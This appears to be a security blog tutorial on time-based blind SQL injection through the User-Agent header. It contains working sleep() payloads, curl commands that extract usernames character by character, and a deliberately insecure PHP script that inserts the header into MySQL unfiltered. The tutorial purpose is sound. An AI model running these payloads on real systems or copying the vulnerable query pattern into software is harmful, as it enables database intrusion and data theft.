[SQL injection] User Agent injection attack

by do son · Published · Updated

10 million Malaysian citizenship information

User Agent: sometimes abbreviated as UA, the user agent is a browser text string that is given to each website you visit; containing information such as the browser version, compatibility, operating system, and any modifying plugins. Using this data, a website can assess the capabilities of your computer, optimizing a page’s performance and display.

Look at request like following:

GET / HTTP/1.1

host: www.example.com

Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select*from(select(sleep(20)))a)+'

Accept-Encoding: gzip, deflate, sdch

Accept-Language: en-US,en;q=0.8,fr;q=0.6

 

This is a simple request to visit the WEB home page, at first glance seems to be no problem. Unless you carefully review the User-Agent sections:

Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select*from(select(sleep(20)))a)+

 

At the string end, the attacker attempts to value SQL injection:'+(select*from(select(sleep(20)))a)

Common SQL injection is usually a URL and its parameters, but here the attacker puts the SQL query hidden in the HTTP header into the field. This technique is commonly used in a variety of scanners, for example, the SqlMap with -p parameters will try the HTTP request header field for injection.

Delay Injection

Many SQL injections are trying to extract information from a website (such as username, password, or other privacy information). But this statement is not the same, it requested the database process to wait 20 seconds. This attack belongs to the SQL blind, the general SQL injection will query the results back to the WEB page, and the blind attacker can not see the output of the query, so they will use another way to determine the injection. Two common ways is to make the WEB server error or delay. As above, the use of sleep will be WEB server wait 20 seconds to respond, the attacker can respond to whether the delay occurs to determine whether there is injection vulnerability.

Example

For a better explanation, I used PHP to create an insecure application that will save the User-Agent to the MySQL database. This type of code may exist in real-world applications to analyze information, such as statistical visits.

insecure.php PHP code:

<?php

$link = new mysqli('localhost', 'insecure', '1ns3cur3p4ssw0rd', 'analytics');

$query = sprintf("INSERT INTO visits (ua, dt) VALUES ('%s', '%s')",

$_SERVER["HTTP_USER_AGENT"],

date("Y-m-d h:i:s"));

$link->query($query);

?>

<html><head></head><body><b>Thanks for visiting</b></body></html>

 

This code connects to the local analytics database and inserts the User-Agent field of the visitor’s HTTP header into the database without filtering.

This is an example of SQL injection, but because our code does not produce any errors, so the attacker can not pass the error to see if there are injection vulnerabilities, unless they use a similar sleep().

In order to verify the existence of injection vulnerabilities, only need to execute the following command:

curl -A "Mozilla/5.0', (select*from(select(sleep(20)))a)) #" http://example.com/insecure.php

 

 

This sets the User-Agent field of the HTTP header to Mozilla/5.0′, (select*from(select(sleep(20)))a)) #. And we are not safe because PHP code will be without filtering directly into the string into the query, the query at this time into the following way:
Should have inserted two values, but now only insert a value of Mozilla / 5.0 and execute (select*from(select(sleep(20)))a)
The following is the result of receiving the server after the operation of the results, we use the time command to see how long this process in the end:

See 20 seconds yet, the successful implementation of the SQL injection.

Exploit

See this, you might think “it’s really simple, but hackers do not seem to attack my site.” But unfortunately, the rich SQL statement makes it even if only three lines of PHP code insecure.php, can also make the attacker get far more than just make the database sleep for 20 seconds. Although an attacker’s INSERT INTO query will only write data to the database, it will still allow them to extract sensitive information and gain access.

For a demo example, we created a table named user in the database, which contains two users named root and john. The following shows how the attacker found the john user, they can manually construct the user name and according to the corresponding time to determine whether the existence of this user.

curl -A "Mozilla/5.0', (select sleep(20) from users where substring(name,1,1)='a')) #" http://example.com/insecure.php

 

This request will be immediately responded, because the database does not have a user name, but

curl -A "Mozilla/5.0', (select sleep(20) from users where substring(name,1,1)='j')) #" http://example.com/insecure.php

 

This request will take 20 seconds. So that after guessing the first letter of the user name, the attacker can continue to guess the user name second, third letter, etc., the same technology can also be used to extract other data from the database.

If our application is more complex, such as a blog comment system, then we can use this vulnerability to the database of some information transferred to a comment, so that we can visit the page directly to the database information, and this method It is usually used when a large amount of data needs to be extracted.

Tags: blind sqlisql injectionsqlitime delay sqli